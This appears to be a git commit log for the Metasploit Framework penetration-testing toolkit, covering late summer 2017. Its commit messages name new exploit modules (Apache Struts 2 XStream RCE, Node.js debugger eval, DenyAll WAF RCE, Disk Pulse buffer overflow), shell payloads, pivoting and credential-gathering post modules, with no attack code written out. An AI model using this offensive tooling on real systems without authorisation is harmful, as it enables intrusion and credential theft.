OJ 89f508a500 Land #9039: add transport command to java on OSX 2017-10-04 12:56:02 +10:00
Tim e534d3cdc8 fix transport and sleep commands on java 2017-10-04 10:36:01 +08:00
William Vu 10dafdcb12 Fix #9036, broken refs in bypassuac_comhijack
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
William Vu 5b9a4d73ee Readd hostless loot display
In the chance event someone actually managed to store it.
2017-10-02 23:31:44 -05:00
William Vu 403b5e2fa8 Move TARGET check into option_values_payloads 2017-10-02 23:22:42 -05:00
Spencer McIntyre 949633e816 Cleanup cve-2017-8464 template and build script 2017-10-02 15:18:13 -04:00
William Webb ae785f9a08 Land #9036, Remove dead Youtube link 2017-10-02 11:18:20 -05:00
ashish gahlot 9ff6efd3a3 Remove broken link 2017-10-02 20:43:55 +05:30
h00die c5cc2f89a0 add docs for wlan_geolocate 2017-10-01 19:49:48 -04:00
h00die fc66683502 fixes #8928 2017-10-01 19:49:32 -04:00
Martin Pizala e3326e1649 Use send_request_cgi instead of raw 2017-10-01 02:15:43 +02:00
Martin Pizala 701d628a1b Features for selecting the target 2017-10-01 02:04:10 +02:00
Spencer McIntyre f2f48cbc8f Update the CVE-2017-8464 module 2017-09-30 18:25:16 -04:00
h00die a676f600d6 fixes to more modules 2017-09-30 15:45:52 -04:00
h00die 8a49a639a0 check file exists before reading 2017-09-29 22:34:38 -04:00
h00die 7fc9be846a bcoles suggestions 2017-09-29 20:29:30 -04:00
William Vu b9bed5af95 Land #9028, vprint_* fix for AuthBrute 2017-09-29 19:04:07 -05:00
William Vu 9941097a5c Remove extraneous else 2017-09-29 19:01:04 -05:00
William Vu e8d0f2dde0 Fix missing message for vprint_* in AuthBrute 2017-09-29 18:51:35 -05:00
bigendiansmalls 8af2e5a7ee Cleanup revshell for zos
remove unused code, extra comments
align code, etc. no functionality changes
2017-09-29 18:27:29 -05:00
William Vu 6de986bd70 Fix cache invalidation bug in tab completion
We use active_module instead of cmd_use to invalidate @cache_payloads,
since the ivar is no longer shared between cmd_set and cmd_use.

Fixes #8483. See #7655.
2017-09-29 18:01:50 -05:00
bigendiansmalls 9ae8bdda1c Added Bind Shell JCL Payload for mainframe
The bind shell is the companion payload to the reverse_shell_jcl
payload for the mainframe platform.
2017-09-29 16:52:36 -05:00
William Vu 0723477b49 Fix nil bug in loot -a and nix hostless loot
Apparently you can't actually store hostless loot.
2017-09-29 16:16:16 -05:00
William Vu 1ec968192b Add tab completion to the edit command 2017-09-29 15:43:53 -05:00
bwatters-r7 e0fee9e317 Land #8821, Expose session naming 2017-09-29 15:32:47 -05:00
Metasploit 32104eb90e Bump version of framework to 4.16.10 2017-09-29 10:04:04 -07:00
Pearce Barry e5a3441c98 Land #9020, fix #9019 - Travis Timeouts on build 2017-09-29 10:25:40 -05:00
Christian Mehlmauer 5c0bb26060 increase travis timeout 2017-09-29 11:50:02 +02:00
Christian Mehlmauer de017eed3c fix #9019 2017-09-29 10:57:46 +02:00
William Vu 9b75ef7c36 Land #8343, qmail Shellshock module 2017-09-29 00:28:30 -05:00
William Vu daedf0d904 Clean up module 2017-09-29 00:27:22 -05:00
h00die 6cc5324e5b oe is all umlaut 2017-09-28 19:52:02 -04:00
Martin Pizala f973ff13b6 Add some lines to Exploit Detection and Mitigation 2017-09-29 00:55:53 +02:00
Martin Pizala 3a1a437ac7 Rubocop Stlye 2017-09-28 23:53:45 +02:00
Martin Pizala 40c58e3017 Function for selecting the target host 2017-09-28 23:43:59 +02:00
Martin Pizala cc98e80002 Change arch to ARCH_X64 2017-09-28 20:50:18 +02:00
RootUp 26108f5ac9 Create ibm_lotus_notes.md 2017-09-28 10:31:42 -05:00
h00die 2295146dcd working optionsbleed module 2017-09-27 22:07:57 -04:00
Adam Cammack 254602174f Land #9016, Bump payloads for getsystem fix 2017-09-27 19:23:03 -05:00
OJ 7ea14e8431 Update payloads for getsystem fixes 2017-09-28 09:43:02 +10:00
h00die 997b831b52 implement regexes 2017-09-27 19:33:50 -04:00
William Vu a47536bb1b Land #9013, Nokogiri mixin port-less fix 2017-09-27 13:52:55 -05:00
loftwing f777e2ab3b Merge branch 'master' into fix_nmap_imports
bringing branch up to date
2017-09-27 12:52:27 -05:00
loftwing 51c1cddb5c Removed requirement for a host to have ports 2017-09-27 12:43:50 -05:00
Brent Cook e39b7fd859 Land #9011, revert changes that hung getsystem/getprivs 2017-09-27 08:38:56 -05:00
OJ 3068fb6e7e Fix getprivs and getsystem
This is a fix for crap and stupid stuff that I did half way through the
packet pivot code. I was working on some priv stuff at the same time,
and when I realised that the work I was doing was not sensible as part
of the packet pivot PR, I failed to revert my changes properly.

As a result I broke `getprivs` and `getsystem`. I am sorry. And I'm
ashamed.
2017-09-27 16:31:42 +10:00
Christian Mehlmauer 81406a073e tidy up code 2017-09-27 08:01:48 +02:00
Christian Mehlmauer 41e3895424 remove checks for hardcoded name 2017-09-27 07:41:06 +02:00
h00die 0649d0d356 wip optionsbleed 2017-09-26 22:09:07 -04:00
bwatters-r7 579342c4f6 Land #8955, Fix error messages on telnet_encrypt_overflow.rb 2017-09-26 16:08:58 -05:00
bwatters-r7 66d6ac418a Land #8978, Add smb1 scanner 2017-09-26 16:06:41 -05:00
Brent Cook 0d31c1c9a8 Land #8945, fix issue where we can call shutdown on a closed socket 2017-09-26 16:01:51 -05:00
Brent Cook 71f13db918 style updates 2017-09-26 15:58:43 -05:00
Adam Cammack 0408979e54 Land #9005, Remove spurious commas 2017-09-26 15:36:33 -05:00
Brent Cook cad36ee14e Land #8952, suhosin compatibility added to staged payload 2017-09-26 15:22:36 -05:00
Brent Cook ea751dde4c Land #8992, Bump Ruby to 2.4.2 2017-09-26 15:07:17 -05:00
Adam Cammack 968ae8e267 Land #8925, Allow edit to optionally take a path 2017-09-26 13:32:39 -05:00
root ec51ab2547 Exit function param bug 2017-09-26 11:16:41 +03:00
William Vu b10d6b8b63 Land #9001, SSLVersion consolidation for modules 2017-09-25 15:53:18 -05:00
William Vu 98ae054b06 Land #8931, Node.js debugger exploit 2017-09-25 14:00:13 -05:00
William Vu d234409d40 Land #8918, wp_admin_shell_upload multisite fix 2017-09-25 13:54:10 -05:00
William Vu 64dca2dd59 Land #8969, msftidy exit code rework 2017-09-25 13:45:26 -05:00
Brent Cook 7924667e51 appease alignists 2017-09-25 09:10:10 -05:00
Brent Cook 62ee4ed708 update modules to use inherited SSLVersion option 2017-09-25 09:03:22 -05:00
g0tmi1k 1ee590ac07 Move over to rex-powershell and version bump
Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
2017-09-25 13:45:06 +01:00
h00die 273d49bffd Land #8891 login scanner for Inedo BuildMaster 2017-09-24 13:30:17 -04:00
h00die e6c4a87bda documentation update 2017-09-24 13:29:34 -04:00
h00die 4d1e51a0ff Land #8906 RCE for supervisor 2017-09-24 08:03:30 -04:00
Brent Cook 7c1f965973 update tests to Ruby 2.3.5 too 2017-09-23 21:16:12 -04:00
Brent Cook ccc2636fd4 bump Ruby to 2.4.2, fix security issues 2017-09-23 21:12:12 -04:00
Brent Cook d73e95e7db Land #8946, fix #8879, APK injection edge cases 2017-09-23 20:48:12 -04:00
Jannis Pohl 48188e999e post/windows/manage/persistence_exe: fix service creation
Fixes service creation when in post/windows/manage/persistence_exe
2017-09-23 23:48:50 +02:00
h00die 9528f279a5 cleaned up version, and docs 2017-09-23 10:51:52 -04:00
RootUp e4f79879ba Update and rename modules/auxiliary/dos/ibm_lotus_notes.rb to modules/auxiliary/dos/http/ibm_lotus_notes.rb 2017-09-23 18:27:50 +05:30
Pearce Barry e8eeb784e4 Land #8960, spelling/grammar fixes part 3 2017-09-22 18:51:31 -05:00
Pearce Barry 8de6fa79c1 Tweakz, yo. 2017-09-22 18:49:09 -05:00
Pearce Barry d56fffcadf Land #8974, spelling/grammar fixes part 4. Finished. 2017-09-22 14:59:28 -05:00
Pearce Barry f1be6b720b Tweaky bits. 2017-09-22 13:38:06 -05:00
Pearce Barry 8853193542 Land #8987, Fix opening non-existant files on unix 2017-09-22 13:15:44 -05:00
Metasploit 68fa3d45f3 Bump version of framework to 4.16.9 2017-09-22 10:05:19 -07:00
Adam Cammack 62aac450f8 Change confusing variable name 2017-09-22 11:43:26 -05:00
Adam Cammack 4ea8f639a3 Add host and service reporting to external modules 2017-09-22 11:42:32 -05:00
RootUp 669b6771e3 Update ibm_lotus_notes.rb 2017-09-22 17:16:42 +05:30
RootUp a71edb33be Create ibm_lotus_notes.rb 2017-09-22 17:08:05 +05:30
h00die ddbff6ba3c Land #8980 unauth RCE for denyAll WAF 2017-09-21 21:41:33 -04:00
h00die 36fc01d375 check files before opening 2017-09-21 19:36:19 -04:00
Mehmet Ince 3d543b75f5 Fixing typos and replacing double quotes with single 2017-09-21 23:48:12 +03:00
Brent Cook 9b12b2a627 Land #8985, pull in rapid7/metasploit-payloads#235 2017-09-20 07:25:50 -05:00
Brent Cook 29f65e3dce finish bumping payloads 2017-09-20 07:25:30 -05:00
William Webb 721277d39d bump metasploit-payloads to 1.3.8 2017-09-20 05:04:13 -05:00
Mehmet Ince 1031d7960a Moving token extraction to the seperated function 2017-09-20 10:23:32 +03:00
bwatters-r7 5a62e779aa Land #8954, fix internal usage of bindata objects when generating NTP messages 2017-09-19 09:01:49 -05:00
Brent Cook faeffc365b Land #8973, remove obsolete code from Meterpreter client core 2017-09-19 08:07:35 -05:00
Mehmet Ince ee969ae8e5 Adding DenyAll RCE module 2017-09-19 14:53:37 +03:00
Brent Cook d8ee4150e6 move client core constants closer to where they are actually used 2017-09-19 03:22:13 -05:00
Brent Cook 5b579baa33 remove unused Linux migration code 2017-09-19 03:04:43 -05:00
Brent Cook 0e15b2d002 remove unneeded METERPRETER_TRANSPORT constants 2017-09-19 02:59:05 -05:00
loftwing c584592a4b Remove leftover IPs in docs 2017-09-18 15:12:42 -05:00
loftwing c953842c96 Added docs and additional dialects 2017-09-18 15:02:38 -05:00
loftwing 7d07f7054d Merge remote-tracking branch 'origin/master' into add_smb1_scanner 2017-09-18 13:16:06 -05:00
loftwing d07fe2f1e7 Added reporting back, removed wfw dialect 2017-09-18 13:15:19 -05:00
h00die 08dea910e1 pbarry-r7 comments 2017-09-17 19:38:43 -04:00
h00die c90f885938 Finished spelling issues 2017-09-17 16:00:04 -04:00
RageLtMan 271bd4c4fe Rename METERPRETER_TRANSPORT_SSL to ..._TCP
Since OpenSSL is no longer packages with meterpreter, and transport
secrecy is handled at L7, the SSL cons name doesn't apply anymore.
Rename METERPRETER_TRANSPORT_SSL to METERPRETER_TRANSPORT_TCP for
consistency with wire-level implementation.
2017-09-17 14:31:15 -04:00
Pearce Barry 6985469009 Land #8971, Fix consistency issue in 'r7-metasploit' banner 2017-09-16 16:42:19 -05:00
William Webb d967ce4523 Land #8979, Add missing payload specs 2017-09-15 22:42:56 -05:00
Jeffrey Martin 2c040d932c add some missing payload specs 2017-09-18 15:45:00 -05:00
james 831b148ac6 Fix consistency issue in 'r7-metasploit' banner
This has bugged me for a while, finally fixing it.
2017-09-15 22:19:00 -05:00
William Webb d5362333e2 Land #8958, Add Disk Pulse Enterprise web server buffer overflow 2017-09-15 13:34:22 -05:00
loftwing 6f5eb5a18f update 2017-09-15 12:07:28 -05:00
Metasploit b2f5bd16e6 Bump version of framework to 4.16.8 2017-09-15 10:02:38 -07:00
Pearce Barry e651bc1205 Land #8951, Hwbridge auto padding fix and flowcontrol 2017-09-15 08:33:17 -05:00
Christian Mehlmauer 7578913058 rework msftidy exit codes 2017-09-15 10:27:04 +02:00
james 4e81a68108 Simplify saving valid credentials by calling store_valid_credential 2017-09-15 00:18:33 -05:00
loftwing e88b766276 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner 2017-09-14 17:00:45 -05:00
loftwing 646dda7958 Add initial smbv1 scanner code 2017-09-14 16:59:39 -05:00
Pearce Barry 9b5350ff9c Land #8967, msftidy - fix missing newline 2017-09-14 13:28:52 -05:00
loftwing e3deaadcc7 Documentation added 2017-09-14 11:52:15 -05:00
Christian Mehlmauer c77cb51d64 add newline 2017-09-14 18:26:11 +02:00
Jeffrey Martin a992a3c427 Land #8774, Post module for gather Docker credentials 2017-09-14 10:15:03 -05:00
Pearce Barry 200a1b400a Remove spaces to appease msftidy. 2017-09-14 09:28:38 -05:00
h00die 3034930556 Land #8953 executable extra newline removal 2017-09-14 10:10:01 -04:00
h00die a1583de055 added pound shebang to vxencrypt 2017-09-14 10:09:31 -04:00
h00die 30f833f684 80 pages left 2017-09-13 22:03:34 -04:00
loftwing 52385f4d9e fix formatting to fit rubocop 2017-09-13 11:46:57 -05:00
loftwing b8c40a9d95 Clean up formatting 2017-09-13 11:13:33 -05:00
loftwing 3c204f91ef Correct module title 2017-09-13 11:02:13 -05:00
loftwing 65f2ee9109 added generate_seh_record 2017-09-13 10:56:32 -05:00
loftwing 7db506887b Add exploit code 2017-09-13 10:36:36 -05:00
loftwing eb0d174987 Add disk_pulse_enterprise_get module 2017-09-13 10:19:24 -05:00
Tim 9afb09813f update cmd_edit_help text 2017-09-13 14:54:35 +08:00
William Webb a07f7c9f42 Land #8520, Linux post module to find and collect TOR hidden service configurations 2017-09-12 13:39:18 -05:00
Erik Lenoir 27a517e0f6 Fix #8060, cf #8061 2017-09-12 18:41:51 +02:00
Brent Cook a7a17c677c fix internal usage of bindata objects when generating NTP messages 2017-09-12 09:54:09 -04:00
Anant Shrivastava 86726978ed payload size updated 2017-09-12 19:23:31 +05:30
heitor.gouvea@ima.sp.gov.br 1c44406e94 Removing unnecessary spaces 2017-09-12 10:00:18 -03:00
Anant Shrivastava 363d3c28d7 suhosin comaptibility added to staged payload 2017-09-12 08:49:53 +05:30
Craig Smith e4465c9350 Fixed a bug where flowcontrol caused the first packet to get lost 2017-09-11 19:00:53 -07:00
Craig Smith b218cc3c7f Merge branch 'master' into hw_auto_padding_fix 2017-09-11 18:30:34 -07:00
Craig Smith 363e11850b Added FC to documentation 2017-09-11 18:29:27 -07:00
Craig Smith ad9329993d Added better padding and flowcontrol support. 2017-09-11 18:20:57 -07:00
Pearce Barry 7b87915e1f Land #8923, Add additional error checking to mssql_clr_payload module 2017-09-11 17:39:33 -05:00
Martin Pizala 5ae708081d Wording, reviewer remarks 2017-09-11 23:25:10 +02:00
Jeffrey Martin a58552daad Land #8825, Handle missing util.pump in nodejs shell payloads 2017-09-11 15:32:21 -05:00
Tod Beardsley 5f66b7eb1a Land #8940, @h00die's second round of desc fixes
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
Tod Beardsley cfbd3c1615 Fix spelling of Honeywell 2017-09-11 13:02:18 -05:00
Tim c3fa30707d fix #8879, fix APK injection edge cases 2017-09-11 12:03:20 +08:00
james ba880d1a85 Changes to mssql_clr_payload error handling based on code review 2017-09-10 14:15:39 -05:00
Patrick Thomas 2966fb7c8c Accept @shawizard suggestion for formatting msg_body 2017-09-10 11:23:52 -07:00
h00die fc52ef9941 Land #8942 docs for syn port scanner 2017-09-10 10:03:34 -04:00
h00die ddfa1d722b fixed grammar 2017-09-10 10:02:07 -04:00
RageLtMan 8d60fdf9e7 Bug - HTTP Client can call :shutdown on closed IO
When running Rex HTTP client calls across pivots, pivot sockets
can get closed by the remote server, resulting in a closed :conn
object within the client object. The clients :close method calls
self.conn.shutdown which raises an 'IOError closed stream' on what
is effectively a TCPSocket object in a closed state (under the Rex
abstraction).

Resolve by moving the self.conn.closed? check into the conditional
just above the :shutdown call, and remove if from the underlying
:close call as calling :close on an already closed TCPSocket
returns nil as opposed to throwing an exception like the :shutdown
method.
2017-09-10 03:09:59 -04:00
james 861f4a6201 Changes to buildmaster_login from code review
Use peer property in messages instead of rhost rport combination for consistency.
Documentation updated accordingly.
2017-09-09 18:00:04 -05:00
james 47adfb9956 Fixes from code review to buildmaster_login
Per bcoles, the most important fixes are:
- Removing `self.class` from call to `register_options`
- Adding rescue to login_succeeded to handle bad json
2017-09-09 16:26:01 -05:00
Deepanshu Gajbhiye 4ec72d7091 Update syn.md 2017-09-09 20:15:13 +05:30
h00die 7339658ba9 224 pages of spelling issues left 2017-09-09 09:52:08 -04:00
Deepanshu Gajbhiye 8138396ab5 Update syn.md 2017-09-09 13:28:18 +05:30
h00die 6289cc0b70 Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin 2017-09-08 22:20:39 -04:00
h00die 0910c482a9 35 pages of spelling done 2017-09-08 22:19:55 -04:00
Metasploit faa84faf25 Bump version of framework to 4.16.7 2017-09-08 15:38:22 -07:00
Brent Cook f8f363c5c9 Land #8944, bump payloads, fix java/android shell expansion 2017-09-08 14:03:15 -05:00
Brent Cook 8f864c27e3 Land #8924, Add Apache Struts 2 REST Plugin XStream RCE 2017-09-08 13:59:52 -05:00
Brent Cook 54a62976f8 update versions and add quick module docs 2017-09-08 13:59:29 -05:00
Brent Cook 6b0b2550ec bump payloads, add shell expansion for java/android payloads 2017-09-08 13:45:54 -05:00
William Vu 978fdb07b0 Comment out PSH target and explain why
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
2017-09-08 13:41:06 -05:00
dmohanty-r7 c91ef1f092 Land #8768, Add Docker Daemon TCP exploit module 2017-09-08 12:50:00 -05:00
Metasploit f5a73f3efe Bump version of framework to 4.16.6 2017-09-08 10:03:41 -07:00
Pearce Barry 2ebf53b647 Minor tweaks... 2017-09-08 10:04:47 -05:00
Brent Cook 2a884af022 Land #8943, update android/java meterpreter for config size changes 2017-09-08 10:10:31 +02:00
Brent Cook d38ee0f1ee bump payloads, grab java/android fixes for #8938
fixes #8938
2017-09-08 10:08:22 +02:00
Deepanshu Gajbhiye 35ecc822f1 Update syn.md 2017-09-08 13:23:30 +05:30
Deepanshu Gajbhiye bead7374de syn.md
documentation for syn portscan
2017-09-08 02:57:46 -04:00
h00die 00c593e0a2 55 pages of spelling done 2017-09-07 21:18:50 -04:00
William Vu a9a307540f Assign cmd to entire case and use encode for XML
Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:36:08 -05:00
William Vu 8f1e353b6e Add Apache Struts 2 REST Plugin XStream RCE 2017-09-07 19:30:48 -05:00
Brent Cook a0181a4d54 Land #8831, Add Maven post-exploitation credential extraction module
Merge remote-tracking branch 'upstream/pr/8831' into upstream-master
2017-09-08 00:37:03 +02:00
Brent Cook c15968e0d3 Land #8939, Fix payload permissions in docker priv_esc module 2017-09-08 00:11:31 +02:00
James Barnett 7e9d0b3e9b Fix permissions in docker priv_esc module
The previous command didn't give the original user enough permissions
to execute the payload. This was resulting in permission denied
and preventing me from getting a root shell.

Fixes #8937
2017-09-07 16:48:02 -05:00
Brent Cook c67e407c9c Land #8880, added Cisco Smart Install (SMI) scanner 2017-09-07 08:06:03 -05:00
Brent Cook a304df265c fix spelling 2017-09-07 08:02:30 -05:00
g0tmi1k accb77d268 Add PSH (Binary) as a target to web_delivery 2017-09-07 10:55:29 +01:00
Brent Cook ee9e4275d5 Land #8926, remove obsolete HACKING file 2017-09-07 02:36:18 -05:00
Brent Cook 50c168415c remove HACKING from yardopts 2017-09-07 02:35:56 -05:00
Brent Cook 65d17784d4 finish the job 2017-09-07 02:34:36 -05:00
Brent Cook eeb51447af Land #8932, Packet-level pivot support and named pipe transports 2017-09-07 02:28:22 -05:00
Brent Cook b9fdca04a1 rework logical fix for #8884 to function with bootstrap code 2017-09-07 01:43:58 -05:00
Brent Cook c365db135a pull in GUID fixes from #8818 2017-09-07 01:39:49 -05:00
Brent Cook 9877a61eff bump payloads 2017-09-07 01:36:25 -05:00
OJ b38a962c09 Fix default session GUID when not specified
This resolves an issue with stategless HTTP sessions
2017-09-07 01:36:25 -05:00
OJ 7a2a47586b Fix named pipe migration stubs 2017-09-07 01:36:25 -05:00
OJ 5294722b96 Prevent socket-like behaviours during migrate on pivoted sessions 2017-09-07 01:36:24 -05:00
OJ dfba42e2c1 Fix exception when datastore value is nil in meterp session 2017-09-07 01:36:24 -05:00
OJ 4ec87985a2 Fix stager crash and support pivots in x64 meterp loader 2017-09-07 01:36:24 -05:00
OJ c8b8ef03bd Force max 0x10000 bytes when reading from pipe in stager 2017-09-07 01:36:23 -05:00
OJ bfdea35aca A few UI touch ups 2017-09-07 01:36:23 -05:00
OJ 75270af9e7 Tweaking of the pivot list output 2017-09-07 01:36:23 -05:00
OJ 8b8e5e4cb5 First iteration of the pivot menu for meterpreter 2017-09-07 01:36:23 -05:00
OJ d525b015f0 Enable keepalive for pivoted sessions 2017-09-07 01:36:22 -05:00
OJ 558d007d8e Final tweak to avoid issues in session dump 2017-09-07 01:36:22 -05:00
OJ f004e6f0f2 Fix session output for pivoted sessions 2017-09-07 01:36:22 -05:00
OJ 7acd772c10 Pivot session stability, display and handling 2017-09-07 01:36:21 -05:00
OJ fdc9864b61 First working packet pivot session! 2017-09-07 01:36:20 -05:00
OJ e3de01219a Pushed on with more pivot code 2017-09-07 01:33:54 -05:00
OJ abc80655b7 Progress in named pipe pivots, more to come 2017-09-07 01:33:54 -05:00
OJ 816e78b6f6 First pass of named pipe code for pivots 2017-09-07 01:33:53 -05:00
Patrick Thomas 5d009c8d0b remove dead code 2017-09-06 23:21:56 -07:00
Patrick Thomas 048316864c remove redundant return 2017-09-06 23:01:13 -07:00
Patrick Thomas 97d08e0da4 fix reviewer comments 2017-09-06 22:53:02 -07:00
Patrick Thomas 637b83a0ea add docs for nodejs debugger eval exploit 2017-09-06 22:29:46 -07:00
Patrick Thomas d71f7876b8 initial commit of nodejs debugger eval exploit 2017-09-06 22:29:24 -07:00
William Vu 36bbe00ea1 Land #8922, db_nmap tab completion fix 2017-09-07 00:28:03 -05:00
g0tmi1k 96f7012fe7 Code clean up (URLs, ordering and printing) 2017-09-06 13:17:28 +01:00
g0tmi1k b884705a93 regsvr32_applocker_bypass_server -> web_delivery 2017-09-06 12:35:52 +01:00
g0tmi1k e7b4cb71b1 Add PSH-Proxy to multi/script/web_delivery 2017-09-06 12:27:04 +01:00
yaya123456778908 bcec8c8eab Update HACKING 2017-09-06 14:18:08 +03:00
Tim bc02df16b3 update cmd_edit_help 2017-09-06 16:04:54 +08:00
Tim e83e4d0a7e add argument to cmd_edit 2017-09-06 11:30:28 +08:00
h00die be66ed8af3 Land #8788 exploits for Gh0st and PlugX malware controllers 2017-09-05 20:42:07 -04:00
james 44fb059cea Add error checking to mssql_clr_payload
Additional error checking had been added to exploits/windows/mssql/mssql_clr_payload
If an error is encountered when changing the trustworthy or clr setting, the exploit fails with a message.
2017-09-05 18:48:22 -05:00
Professor-plum 33e1777bab Merge pull request #1 from h00die/updates
Modules cleanup and add docs
2017-09-05 13:48:09 -06:00
Adam Cammack b0dc44fb86 Land #8909, Avoid saving some invalid creds 2017-09-05 12:43:03 -05:00
Tim 636d1a5fcb fix #8921, fix crash on nmap tab completion 2017-09-05 16:36:14 +08:00
h00die d05c401866 modules cleanup and add docs 2017-09-04 20:57:23 -04:00
james fde68acc0e Styling changes in wordpress helpers
Changes based on rubocop output
2017-09-02 22:26:04 -05:00
james fdf7149438 Add support for multi-site wp instances in wp_admin_shell_upload
This change allows for redirects to be followed in wordpress_helper_get_plugin_upload_nonce
Redirect is from:
/wp-admin/plugin-install.php
to
/wp-admin/network/plugin-install.php
2017-09-02 22:12:56 -05:00
Pearce Barry 6051a1a1c1 Land #8910, Use meta redirect instead of JS redirect in 2 modules 2017-09-01 13:50:02 -05:00
William Webb 055e88d261 Land #8897, Rewrite timestomp command dispatcher to deal with arguments properly 2017-09-01 12:11:57 -05:00
Metasploit 92f5290a50 Bump version of framework to 4.16.5 2017-09-01 10:08:40 -07:00
Brent Cook bcfab11ca9 land #8913, fix false positives of telnet scanner vs http servers 2017-08-31 16:31:08 -05:00
Brent Cook 7c14a3d370 expand the check for weird HTTP / HTML serving servers 2017-08-31 16:30:02 -05:00
Tod Beardsley 86db2a5771 Land #8888 from @h00die, with two extra fixes
Fixes spelling and grammar in a bunch of modules. More to come!
2017-08-31 14:37:02 -05:00
Tod Beardsley 8a045e65aa Spaces between commas 2017-08-31 14:29:23 -05:00
Tod Beardsley 642a13e820 Out out damn tick 2017-08-31 14:29:05 -05:00
Adam Cammack 3c1abe6437 Land #8904, Add Meterpreter mid-stager for AArch64 2017-08-31 12:25:05 -05:00
Jin Qian 1a735c48b4 Fix MS2715, false positive when telneting against web server
Add a condition to identify when server returned HTML as login failure
2017-08-31 11:35:51 -05:00
Tim 86ee77ffb0 add aarch64 nops and fix aarch64 cmdstager 2017-08-31 18:48:58 +08:00
Adam Cammack 195c1e041f Update payload specs and sizes
Adds the new Aarch64 and R payloads

fix merge
2017-08-31 18:48:56 +08:00
Tim ffbf21cb1c cleanup 2017-08-31 18:35:18 +08:00
Tim 7b71f60ea1 fix the stack 2017-08-31 18:35:18 +08:00
Tim 26f4fa3b09 setup stack 2017-08-31 18:35:17 +08:00
Tim a2396991f0 stager not setting up stack 2017-08-31 18:35:17 +08:00
Tim 6dbe00158f fix stager 2017-08-31 18:35:17 +08:00
james 49173818fd Addresses #8674
This type of redirection will work without javascript being enabled.

Modules:
multi/browser/firefox_xpi_bootstrapped_addon
multi/browser/itms_overflow

More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
2017-08-30 23:16:46 -05:00
Pearce Barry 2bbba9c500 Avoid some ActiveRecord validation errors.
Per discussion with @bcoles in [PR 8759](https://github.com/rapid7/metasploit-framework/pull/8759#issuecomment-325028479), setting a login data's last_attempted_at value while also setting the status to UNTRIED will cause a validation error when there's a running+connected MSF DB.

This PR removes the handful of existing cases we're doing this (thx, @bcoles!).
2017-08-30 15:31:36 -05:00
Jon Hart eec5d2ada9 Update description and add link to SIET 2017-08-30 11:52:11 -07:00
Calum Hutton 3b745bd17c Rework the bash, redirect stdout/err to /dev/null
Dont need the -
2017-08-30 03:49:30 +01:00
Calum Hutton 9387a765e5 Fix msftidy warns/errs 2017-08-30 03:10:46 +01:00
Calum Hutton 52c8fff3cb Make options a list 2017-08-30 03:10:46 +01:00
Calum Hutton 42ab00fd2c Add documentation for module 2017-08-30 03:10:46 +01:00
Calum Hutton 4934023fa5 Use alternate system() payload, dont worry about restarts
Use nohup and & to background the meterpreter process
2017-08-30 03:10:46 +01:00
Calum Hutton d53f10554d Configurable restart command 2017-08-30 03:10:46 +01:00
Calum Hutton d0ff2694b3 Restart after payload process ends 2017-08-30 03:10:46 +01:00
Calum Hutton aee44e3bd2 Working meterpreter exploit
No service restart
2017-08-30 03:10:46 +01:00
Calum Hutton 7cfb5fcc97 Rename 2017-08-30 03:10:46 +01:00
Calum Hutton 8b67b710fa Add template 2017-08-30 03:10:46 +01:00
Brent Cook 202c936868 Land #8826, git submodule remote command execution 2017-08-29 18:11:32 -05:00
Brent Cook 8928197584 rename module docs so they are viewable 2017-08-29 18:09:30 -05:00
Brent Cook 46eeb1bee0 update style 2017-08-29 17:44:39 -05:00
Pearce Barry d5124fdc94 Land #8759, Add TeamTalk Gather Credentials auxiliary module 2017-08-29 13:17:28 -05:00
Tim e1b38ac3a3 fix malicious typo 2017-08-29 17:52:51 +08:00
Tim 5631ddc246 add docs for the git submodule vulnerability 2017-08-29 17:06:30 +08:00
Tim 39299c0fb8 randomize submodule path 2017-08-29 16:54:08 +08:00
Brendan Coles c9e32fbb18 Remove last_attempted_at 2017-08-29 05:05:04 +00:00
Brent Cook fbb0f206fb Land #8903, bump network_interfaces, add Android support 2017-08-28 20:33:34 -05:00
Brent Cook b0c1bfaeb7 bump network_interfaces, add Android support
see #8780
2017-08-28 20:08:06 -05:00
h00die a40429158f 40% done 2017-08-28 20:17:58 -04:00
Brent Cook 847407f1dd Land #8899, Make backgrounding messages more consistent 2017-08-28 18:51:22 -05:00
William Vu 0e1bafb2d1 Land #8902, vendored robots gem 2017-08-28 16:42:38 -05:00
Metasploit a0131f450e Bump version of framework to 4.16.4 2017-08-28 14:34:39 -07:00
Pearce Barry cc33b29f0d Land #8901, update nessus v2 import for consistent proto case 2017-08-28 15:54:47 -05:00
Brent Cook b2fc0e55de remove the first of many robots.rb workarounds 2017-08-28 15:48:09 -05:00
Brent Cook 06fc5c8a3e add license, fix style violations, log with dlog 2017-08-28 15:47:47 -05:00
Brent Cook 3d489a516c Only test the first element of status
From f5df1ba7827581a7c771a3deffb6062551611134 Mon Sep 17 00:00:00 2001
From: Postmodern <postmodern.mod3@gmail.com>
Date: Thu, 4 Aug 2016 19:35:10 -0700
Subject: [PATCH 2/2] Only test the first element of status

* When using webmock, the `"OK"` String is not present in `StringIO#status`.
2017-08-28 15:47:47 -05:00
Brent Cook dafd7885e1 Fixing mix case of user-agent.
From bfbe173cd6bf91be477ef0affc2c4c86ca75bc1d Mon Sep 17 00:00:00 2001
From: Jason Kim <jkim@avvo.com>
Date: Thu, 3 Nov 2011 15:43:14 -0700
Subject: [PATCH 1/2] Fixing mix case of user-agent. Adding/Fixing test.
2017-08-28 15:47:46 -05:00
Brent Cook 928d632042 import https://github.com/fizx/robots.git 0.10.1 2017-08-28 15:47:46 -05:00
Brent Cook f7071818b1 more updates 2017-08-28 14:10:51 -05:00
Jeffrey Martin 368e37428e update nessus v2 import for consistent proto case 2017-08-28 12:32:04 -05:00
Adam Cammack d6ed1f6f8d Make backgrounding messages more consistent
Inspired by the work in #8896
2017-08-28 11:19:17 -05:00
Brent Cook 3bdb572e01 Land #8898, move Dockerfile for publishing 2017-08-28 10:51:52 -05:00
Christian Mehlmauer 4b272f309b update rubygems 2017-08-28 17:14:46 +02:00
Christian Mehlmauer 3e5869e918 move Dockerfile to root 2017-08-28 16:57:28 +02:00
Brent Cook 8fdcc142c7 Land #8896, Output job id when jobifying exploit 2017-08-28 09:10:09 -05:00
